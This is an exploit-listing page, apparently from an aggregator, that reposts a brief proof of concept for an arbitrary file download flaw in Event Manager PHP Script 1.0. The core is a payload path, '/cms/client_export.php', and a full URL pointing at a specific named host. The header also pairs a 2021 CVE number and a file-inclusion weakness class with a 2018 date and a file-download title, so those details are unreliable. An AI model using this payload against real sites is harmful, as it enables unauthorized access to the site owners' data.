Advertisement






Event Manager PHP Script Version 1.0 Arbitrary file download Vulnerability

CVE Category Price Severity
CVE-2021-24936 CWE-98 N/A High
Author Risk Exploitation Type Date
exploitalert.com High Remote 2018-02-16
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.024352 0.542269

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020184

Below is a copy:

Event Manager PHP Script Version 1.0 Arbitrary file download Vulnerability
==========================================================================================================================================
| # Title     : Event Manager PHP Script Version 1.0 Arbitrary file download Vulnerability                                               |
| # Author    : indoushka                                                                                                                |
| # Telegram  : @indoushka                                                                                                               |
| # Tested on : Win 10 X64 /Fr(Pro)                                                                                                      |
| # Vendor    : https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741?s_rank=29                                       |  
| # Dork      : n/a                                                                                                                      |
==========================================================================================================================================

poc :

[+] Use Payload : /cms/client_export.php

http://ezcode.pt/tests/EventManager/cms/client_export.php

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic                  |
                                                                                               |
================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.